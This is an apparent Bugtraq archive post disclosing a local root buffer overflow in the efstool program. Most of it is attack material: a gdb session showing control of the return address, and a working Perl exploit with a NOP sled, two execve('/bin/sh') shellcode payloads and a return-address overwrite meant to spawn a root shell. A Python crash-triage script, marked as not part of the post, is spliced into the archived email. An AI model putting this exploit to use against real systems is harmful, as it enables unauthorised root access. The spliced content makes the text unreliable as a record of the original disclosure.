Bugtraq mailing list archives

efstool local root exploit


From: <clorox () ptrace-networks net>
Date: 28 Jun 2002 00:46:39 -0000



 Ptrace Networks Security
--------------------------

The efstool program shipped with Red Hat, Mandrake, and Slackware contains a
buffer overflow that can be successfully exploited.

[clorox@ptnw clorox]$ efstool `perl -e 'print "A" x 3000'`
Segmentation fault
[clorox@ptnw clorox]$ gdb efstool
GNU gdb 5.1.1
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-mandrake-linux"...(no debugging symbols found)...
(gdb) r `perl -e 'print "A" x 3000'`
Starting program: /usr/bin/efstool `perl -e 'print "A" x 3000'`
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info reg esp
esp            0xbfffe890    0xbfffe890
(gdb)
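As an added triage helper (not part of the post), the following Python parses a gdb session like the one above and reports whether the faulting program counter is made entirely of the fill byte from the test input, which is the usual first check when deciding how seriously to treat a crash report. The embedded transcript is copied from the post; the regular expressions assume gdb 5.x-style output.

```python
import re

# Constructed sample: the gdb session from the post, reduced to the lines that matter.
GDB_TRANSCRIPT = """\
(gdb) r `perl -e 'print "A" x 3000'`
Starting program: /usr/bin/efstool `perl -e 'print "A" x 3000'`
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info reg esp
esp            0xbfffe890    0xbfffe890
"""

SIGNAL_RE = re.compile(r"Program received signal (\w+)")
FAULT_RE = re.compile(r"^0x([0-9a-fA-F]{8}) in (\S+) \(\)", re.MULTILINE)
REG_RE = re.compile(r"^(\w+)\s+0x([0-9a-fA-F]+)", re.MULTILINE)
FILL_RE = re.compile(r'print\s+"(.)"\s+x\s+(\d+)')  # the perl one-liner that built the input

def parse_crash(transcript):
    """Extract signal, faulting PC, symbol, registers and the input fill pattern from a gdb session."""
    info = {"signal": None, "pc": None, "symbol": None, "regs": {}, "fill": None, "fill_len": 0}
    if m := SIGNAL_RE.search(transcript):
        info["signal"] = m.group(1)
    if m := FAULT_RE.search(transcript):
        info["pc"], info["symbol"] = int(m.group(1), 16), m.group(2)
    for name, val in REG_RE.findall(transcript):
        info["regs"][name] = int(val, 16)
    if m := FILL_RE.search(transcript):
        info["fill"], info["fill_len"] = ord(m.group(1)), int(m.group(2))
    return info

def pc_control(pc, fill):
    """Count PC bytes equal to the fill byte; 4 means the saved return address came wholly from input."""
    if pc is None or fill is None:
        return 0
    return sum(1 for i in range(4) if (pc >> (8 * i)) & 0xFF == fill)

def triage(transcript):
    """Classify the crash: a PC of 0x41414141 after feeding 'A's is what makes a crash a security bug."""
    info = parse_crash(transcript)
    n = pc_control(info["pc"], info["fill"])
    if info["signal"] != "SIGSEGV":
        verdict = "no segfault"
    elif n == 4:
        verdict = "pc fully controlled"
    elif n > 0:
        verdict = "pc partially controlled"
    else:
        verdict = "crash in code"
    return verdict, info
```

Running triage(GDB_TRANSCRIPT) on the post's session yields "pc fully controlled" together with esp, which is exactly the register the author reads off next.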


example:
#!/usr/bin/perl
# efstool root exploit
# written by clorox of Ptrace Networks for BKACC (Bored Kids At ComputerCamp)
# give the campers internet grogan!
#
# tested to work on slackware 8, mandrake 8, mandrake 7.1
# tweaks may be needed on the offset
# method 1 works more often but
# method 2 is faster but not too good
#
#
# enjoy -clorox
# perl efs.pl -1000

# execve("/bin/sh") payload used by method 1
$shellcode =
"\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89".
"\x46\x0c\x89\x76\x08\xb0\x0b\x87\xf3".
"\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29".
"\xc0\x40\xcd\x80\xe8\xde\xff\xff\xff".
"/bin/sh";

# alternate execve("/bin/sh") payload used by method 2
$shellcode2 =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88".
"\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3".
"\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31".
"\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".
"\xff\xff/bin/sh";

# esp at the crash, taken from the gdb session above; must be a number,
# not a string, or the addition below silently yields 0
$ret = 0xbfffe890;
$offset = $ARGV[0];
$nop = "\x90";

if ($ARGV[1] eq "m1") {
        # nop sled padded to 3000 bytes, followed by the payload
        $len = 3000;
        for ($i = 0; $i < ($len - length($shellcode)); $i++) {
                $buffer .= $nop;
        }
        $buffer .= $shellcode;
} elsif ($ARGV[1] eq "m2") {
        # longer sled padded to 10010 bytes, followed by the second payload
        $len = 10010;
        for ($i = 0; $i < ($len - length($shellcode2)); $i++) {
                $buffer .= $nop;
        }
        $buffer .= $shellcode2;
} else {
        print "You must specify a method fool!\n";
        print "perl $0 <offset> m1 or m2\n";
        exit 1;
}

# return address (little-endian), written twice to cover the saved eip slot
$buffer .= pack('l', ($ret + $offset));
$buffer .= pack('l', ($ret + $offset));
exec("efstool $buffer");
# and on the seventh day clorox said "LET THERE BE SHELL!"

and on a personal note,
grogan, or any other admins of ceboston, the campers here deserve internet
in our rooms; the computer labs aren't conducive to doing research. As you
can see, we would use it for positive things such as posting to Bugtraq. If
you read this and want to talk it over, talk to me; I'm in room 105 in new
dorm.

-max

